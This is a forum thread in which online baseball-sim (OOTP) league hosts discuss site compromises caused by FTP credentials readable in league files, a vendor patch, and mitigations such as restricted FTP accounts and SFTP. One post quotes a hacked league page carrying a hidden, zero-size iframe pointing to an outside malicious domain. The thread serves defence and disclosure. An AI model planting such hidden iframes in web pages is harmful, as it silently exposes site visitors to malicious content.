Hacker possibly targetting OOTP online leagues

[Tony M]

Quote:

Originally Posted by ericm26

Does anyone know if 2007/2008 have the same security issues as 2009. I run a league that is getting hacked also but we run 2007/2008 not 2009.

Ericm,

I did a search on your posts as you said you ran a 2008 league and I found your website, downloaded your file and was able to get into your ftp site with no difficulties, so yes the problem does exist in 2007/OOTP8.

Now, I've no idea how this can be solved in terms of the executable, but what I would say is change your FTP password, and remove the link on your website to the league file. That way there's no way for anybody who isn't a GM in your league to get access to those details.

[Andreas Raht]

We'll release a patch next week which will address the issue. More info here:

http://www.ootpdevelopments.com/boar...y-problem.html

[Andreas Raht]

Quote:

Originally Posted by Tony M

It is fixed in 9.2.7, but if a Mac or Linux user downloads a 9.2.7 league they won't be able to connect because what it believes is the connection settings will not work.

Until a Mac or Linux 9.2.7 patch comes out, I don't believe that they will be able to access 9.2.7 leagues, but we'd need word from up high as to whether this is true.

Yes, that's true. We'll release Mac and Linux build ASAP.

[Alan T]

I think that people who assume the patch will magically fix their security issue will be let down a bit. What it sounds like the patch will be doing is fixing the hole where the login information/password is viewable within the league dat file in clear text if you look for it. I assume that the patch will be using some form of encryption within the league file so it is not viewable for someone who downloads the file. With the type of encryption that I would assume they would use here, keep in mind that many forms of encryption can still be broken by someone who really wants to do so.

Even without looking through the league file however, it is still extremely trivial getting a ftp account name and password if someone who has ootp9 downloads the file due to how the FTP protocol works. Any person with fairly basic understanding of ftp packets on a network wire could probably still get it, and this is something that can not be patched. It would require a completely different protocol (SFTP for instance) to fix this issue.

Ideally to protect yourself against this type of thing, you could make sure absolutely no one had your league file except for your trusted owners in the league. That is fairly impractical though for most leagues I assume.

To protect yourself, you should create an FTP user account on your ftp server that -only- has access to the import-export folder on the ftp server which contains the team files and the league file and nothing else. Use that account in your ootp league file and it would limit any exposure to the rest of your site. The problem this causes however would be extra complications in updating league html files which would have to either be done manually, or by manually changing the account username/password for the report uploads each time before doing it.

Anyhows, just wanted to make sure it was known that as long as FTP is used, someone competent enough to know how to write a virus/trojan would likely know how to exploit FTP to still get the same information even if it is encrypted within the league file.

[Tony M]

Just to concur with Alan T - the patch won't cure the problem, just make it harder to get the information.

Nothing will be entirely secure, but my suggestion above for OOTP10 would even further limit the scope for exploitation.

[gollum65]

All I want is to make it as hard as possible to gain access to my website. I've implemented the other recommendations, such as an exclusive FTP account, removing the league file links from my website, etc... Fixing this hole will be just another step that makes it harder to hack my site.

I'm sure most of you would agree that if you make it hard enough, the hacker will move on to find another site. After all, if they wanted to WORK, they'd have jobs.

[Andreas Raht]

Quote:

Originally Posted by gollum65

After all, if they wanted to WORK, they'd have jobs.

+1

Well, probably hacking OOTP leagues IS their job

[Raidergoo]

Quote:

Originally Posted by Alan T

It would require a completely different protocol (SFTP for instance) to fix this issue.

That's how the Big Boys send and receive data on Wall Street.

[rewc27]

I want to say thank you to all of you have put your heads together and worked to find the problem. The OOTP community is very lucky to have people that are willing to work together when problems arise and save those of us who don't have a clue when it comes to this stuff.

Also I want to give props to Fidel and All Sim Baseball. Fidel has been great in restoring my site very quickly after the attacks happened.

Thank you all for your hard work and dedication.

[f.montoya]

I just found this in an OOTP 6 online league I host...

Code:

<html>



<head>

<title>OOTP 6 Generated Website</title>

</head>



<frameset rows="100,*" frameborder="0" framespacing="0" border="0">

  <frame name="Banner" scrolling="no" noresize target="Inhalt" src="top.html">

  <frameset cols="100,*">

    <frame name="menu" target="Hauptframe" src="menu.html">

    <frame name="content" src="league.html">

  </frameset>

  <noframes>

  <body><(SPACE HERE) ****** src="http://butx.biz/" style="width: 0px; height: 0px; display: none"><(SPACE HERE)  /******>





  <p>Diese Seite verwendet Frames. Frames werden von Ihrem Browser aber nicht 

  unterst・zt.</p>



  </body>

  </noframes>

</frameset>



</html>

OOTP 6 & 6.5 must have the same hole. Don't have time to check right now but we need an emergency patch for 6 and 6.5 too Andreas.

[Tony M]

butx.biz was in gollum's website too.

[Tony M]

Have any of the others of you who have been attacked still got the log files (or the contents of the files that were hacked). If you can get the IP address of the computer that made the changes that would be good.

[gollum65]

Obviously I still have the IP address from my last attack.

[kq76]

Quote:

Originally Posted by Alan T

To protect yourself, you should create an FTP user account on your ftp server that -only- has access to the import-export folder on the ftp server which contains the team files and the league file and nothing else. Use that account in your ootp league file and it would limit any exposure to the rest of your site. The problem this causes however would be extra complications in updating league html files which would have to either be done manually, or by manually changing the account username/password for the report uploads each time before doing it.

I think I may be able to create an FTP account for ourselves that accesses multiple folders. If I can, would this avoid the problem you spoke of? That, or I could put those two folders in a parent folder and just give the account access to it, right? If it is possible are there any folders other than the exports and reports folders that I should give that account access too?

[Alan T]

Quote:

Originally Posted by kq76

I think I may be able to create an FTP account for ourselves that accesses multiple folders. If I can, would this avoid the problem you spoke of? That, or I could put those two folders in a parent folder and just give the account access to it, right? If it is possible are there any folders other than the exports and reports folders that I should give that account access too?

Owner team uploads go in the same ftp folder as the league file when you upload it. So securely you only need to give an FTP account access to that folder and make sure that directory is not viewable via HTTP and you should be ok from the risk of someone placing an iframes exploit on your site.

The problem with this is you would be unable to upload web reports as those go in other folders on your server and usually ones which obviously have http enabled for. So opening up the ftp account which the league file uses to be able to upload web reports also gives any potential hacker the access or ability to at least hit part of the website as well.

Two ways around this that I can think of:

1) Manually run the web reports from within OOTP and then manually upload them to your server outside of the game using an account that has permission to do so. This requires you to know the directory structure that the web reports get uploaded within.

2) Have two accounts for your league, one the general league upload/download ftp account that is normally in the game and a second account used only for web reports. When you run the league file, get exports, imports etc you use the first account. Then when time to upload web reports switch the settings within the game to the second account/password on your system only to upload the web reports from within the game to the server. Once done make sure you change it back or you will not be able to import owner exports for the next sim.

[canadiancreed]

Quote:

Originally Posted by Raidergoo

That's how the Big Boys send and receive data on Wall Street.

"

Having the ftp data encyrpted and sent and received via at least 128bit SFTP protocol would be the way to go.

Finding hosts that support SFTP? That mgiht be slightly harder. (not impossible, there's some out there)

[kq76]

Have any other leagues experienced problems connecting since switching to 9.2.7? The CBL has and my guess is it may be 9.2.7 because I can connect no problem using the same account info in an ftp client. Then again, at least one person in the league has said they were able to connect through the game using 9.2.7 so why some can and some cannot I have no idea.

[Corsairs]

Quote:

Originally Posted by kq76

Have any other leagues experienced problems connecting since switching to 9.2.7? The CBL has and my guess is it may be 9.2.7 because I can connect no problem using the same account info in an ftp client. Then again, at least one person in the league has said they were able to connect through the game using 9.2.7 so why some can and some cannot I have no idea.

Yes, we're experiencing the same issue. At this time, 10 of my owners have been able to export using 9.2.7 while another 4 are saying they are getting connection errors. I haven't been able to determine any pattern with the affected owners. This was never an issue before, so clearly it has something to do with 9.2.7.

[kq76]

Thanks, Corsairs. I hope they test 9.2.9 extra well then because as it is now I don't think we can proceed until it's released and working correctly.

[molarmite]

I've had a few owners with connection problems but I've talked them through every one of them so far. After about 3-4 hours, our league is running good with almost no problems *knock on wood*.

Make sure they check if they have 9.2.7 because some people don't know that you have to replace the .exe file. Some think you just download it and you're good. Make sure if you changed the password, league file name that they are opening the right file. I had a couple owners who were still trying to open the file with our old name instead of the new one.